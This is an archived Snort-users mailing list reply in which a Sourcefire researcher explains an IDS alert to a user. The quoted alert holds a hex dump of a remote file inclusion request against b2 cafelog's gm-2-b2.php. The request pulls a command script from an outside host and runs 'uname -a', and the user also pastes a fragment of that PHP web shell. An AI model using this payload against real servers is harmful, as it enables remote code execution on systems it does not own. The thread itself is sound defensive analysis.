Re: Is it an real attack ?

[Nigel Houghton <nigel () sourcefire com>]

Around 8:52am someone said:

s :   6. Is it an real attack ? (=?iso-8859-1?Q?Roberto_Samarone_Ara=FAjo_=28RSA=29?=)
s :
s :Message: 6
s :From: =?iso-8859-1?Q?Roberto_Samarone_Ara=FAjo_=28RSA=29?= <sama () inf ufsc br>
s :To: <snort-users () lists sourceforge net>
s :Date: Mon, 29 Dec 2003 04:07:57 -0800
s :Subject: [Snort-users] Is it an real attack ?
s :
s :Hi,
s :
s :     Verifying the snort logs, I found the following attack:
s :
s :[nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt
s :
s :000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67   GET //b2-tools/g
s :010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63   m-2-b2.php?b2inc
s :020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E   =http://www.corn
s :030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63   age.hpg.com.br/c
s :040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61   md.txt??&cmd=una
s :050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61   me%20-a?&cmd=una
s :060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58   me%20-a;echo%20X
s :070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A   FTEAM HTTP/1.0..
s :080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A   HOST: mysite.com-
s :090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A            mysite.com ....
s :
s :I entered on the site: http://www.cornage.hpg.com.br/cmd.txt and I found the
s :following code:
s :
s :-cmd  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
s :  $output = ob_get_contents();
s :  ob_end_clean();
s :  $output = str_replace("\n","\n-cmd ",$output);
s :  if (!empty($output)) echo  str_replace(">", ">", str_replace("<", "<",
s :$output));
s :
s :?>
s :
s :What kind of attack is this ? Are there any place where can I find
s :informations about this attack ?

Always check the rule documentation first:

 http://www.snort.org/snort-db/sid.html?sid=2144

If you are running the cafelog application then yes, this was an attempted
intrusion/attack. The attacker tried to include some code to execute on
the webserver.

The attacker was also trying to execute some system commands like "uname
-a" to get system information as well as the command "echo".

s :Thanks,
s :
s :Robert

-----------------------------------------------------------------------
Nigel Houghton        Security Research Engineer        Sourcefire Inc.
                     Vulnerability Research Team

"In an emergency situation involving two or more officers of equal rank,
seniority will be granted to whichever officer can program a vcr."



-------------------------------------------------------
This SF.net email is sponsored by: IBM Linux Tutorials.
Become an expert in LINUX or just sharpen your skills.  Sign up for IBM's
Free Linux Tutorials.  Learn everything from the bash shell to sys admin.
Click now! http://ads.osdn.com/?ad_id=1278&alloc_id=3371&op=click
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users